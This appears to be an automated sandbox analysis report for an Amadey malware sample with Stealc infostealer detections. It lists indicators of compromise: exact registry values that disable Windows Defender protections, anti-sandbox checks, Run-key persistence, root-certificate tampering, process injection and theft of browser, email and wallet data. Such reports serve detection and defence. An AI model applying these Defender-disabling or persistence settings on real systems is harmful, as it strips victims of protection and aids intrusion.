amadey | 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	ceea5a1e0e.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	ceea5a1e0e.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	ceea5a1e0e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	ceea5a1e0e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	ceea5a1e0e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	ceea5a1e0e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	ceea5a1e0e.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ceea5a1e0e.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	ceea5a1e0e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	ceea5a1e0e.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0974c9d1cc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ceea5a1e0e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d0e63d47c9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d45941d81b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	35d7e2eba2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b799061492.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	baf41f08af.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2068	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3824	powershell.exe
3216	powershell.exe
2068	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 15 IoCs

flow	pid	Process
4	2068	powershell.exe
7	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
8	700	rapes.exe
12	884	BitLockerToGo.exe
18	3000	BitLockerToGo.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d0e63d47c9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d45941d81b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	35d7e2eba2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b799061492.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	baf41f08af.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	baf41f08af.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d0e63d47c9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	35d7e2eba2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0974c9d1cc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0974c9d1cc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d45941d81b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b799061492.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ceea5a1e0e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ceea5a1e0e.exe

Executes dropped EXE 20 IoCs

pid	Process
2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
700	rapes.exe
368	0974c9d1cc.exe
1388	4b99eca92e.exe
112	4b99eca92e.exe
2060	d0e63d47c9.exe
2936	d45941d81b.exe
1388	35d7e2eba2.exe
2340	b799061492.exe
2148	baf41f08af.exe
2636	f4dcb32859.exe
2280	ceea5a1e0e.exe
1708	v6Oqdnc.exe
3440	OEHBOHk.exe
3560	MCxU5Fj.exe
3596	MCxU5Fj.exe
3604	MCxU5Fj.exe
3612	MCxU5Fj.exe
464	Process not Found
3244	ckonftponqgz.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	b799061492.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	baf41f08af.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	d0e63d47c9.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	ceea5a1e0e.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	0974c9d1cc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	d45941d81b.exe
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	35d7e2eba2.exe

Loads dropped DLL 58 IoCs

pid	Process
2068	powershell.exe
2068	powershell.exe
2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
700	rapes.exe
700	rapes.exe
700	rapes.exe
1388	4b99eca92e.exe
2084	WerFault.exe
2084	WerFault.exe
2084	WerFault.exe
2084	WerFault.exe
2084	WerFault.exe
1720	WerFault.exe
1720	WerFault.exe
1720	WerFault.exe
1720	WerFault.exe
1720	WerFault.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
884	BitLockerToGo.exe
700	rapes.exe
700	rapes.exe
2380	WerFault.exe
2380	WerFault.exe
2380	WerFault.exe
3000	BitLockerToGo.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
3232	WerFault.exe
3232	WerFault.exe
3232	WerFault.exe
700	rapes.exe
700	rapes.exe
700	rapes.exe
3560	MCxU5Fj.exe
3560	MCxU5Fj.exe
3560	MCxU5Fj.exe
3668	WerFault.exe
3668	WerFault.exe
3668	WerFault.exe
3668	WerFault.exe
3668	WerFault.exe
3788	WerFault.exe
3788	WerFault.exe
3788	WerFault.exe
3788	WerFault.exe
3788	WerFault.exe
464	Process not Found

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	ceea5a1e0e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ceea5a1e0e.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\b799061492.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105590101\\b799061492.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\baf41f08af.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105600101\\baf41f08af.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\f4dcb32859.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105610101\\f4dcb32859.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\ceea5a1e0e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105620101\\ceea5a1e0e.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
980	powercfg.exe
3936	powercfg.exe
3928	powercfg.exe
3972	powercfg.exe
3944	powercfg.exe
2576	powercfg.exe
1948	powercfg.exe
3056	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000500000001a438-357.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	OEHBOHk.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	ckonftponqgz.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
700	rapes.exe
368	0974c9d1cc.exe
2060	d0e63d47c9.exe
2936	d45941d81b.exe
1388	35d7e2eba2.exe
2340	b799061492.exe
2148	baf41f08af.exe
2280	ceea5a1e0e.exe
1708	v6Oqdnc.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1388 set thread context of 112	1388	4b99eca92e.exe	41
PID 368 set thread context of 884	368	0974c9d1cc.exe	43
PID 2060 set thread context of 3000	2060	d0e63d47c9.exe	49
PID 3560 set thread context of 3612	3560	MCxU5Fj.exe	85
PID 3244 set thread context of 2660	3244	ckonftponqgz.exe	120
PID 3244 set thread context of 3236	3244	ckonftponqgz.exe	123

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\Tasks\rapes.job	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3980	sc.exe
4044	sc.exe
4084	sc.exe
4092	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
2084	1388	WerFault.exe	40
1720	112	WerFault.exe	41
2380	2340	WerFault.exe	54
3232	1708	WerFault.exe	79
3668	3560	WerFault.exe	82
3788	3612	WerFault.exe	85

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d45941d81b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4b99eca92e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d0e63d47c9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	35d7e2eba2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b799061492.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	f4dcb32859.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	baf41f08af.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f4dcb32859.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	f4dcb32859.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ceea5a1e0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0974c9d1cc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4b99eca92e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
2700	taskkill.exe
2740	taskkill.exe
2792	taskkill.exe
1108	taskkill.exe
1604	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0c1e67efd8ddb01	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 5 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	d45941d81b.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	d45941d81b.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	d45941d81b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	35d7e2eba2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	35d7e2eba2.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2852	schtasks.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
2068	powershell.exe
2068	powershell.exe
2068	powershell.exe
2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
700	rapes.exe
368	0974c9d1cc.exe
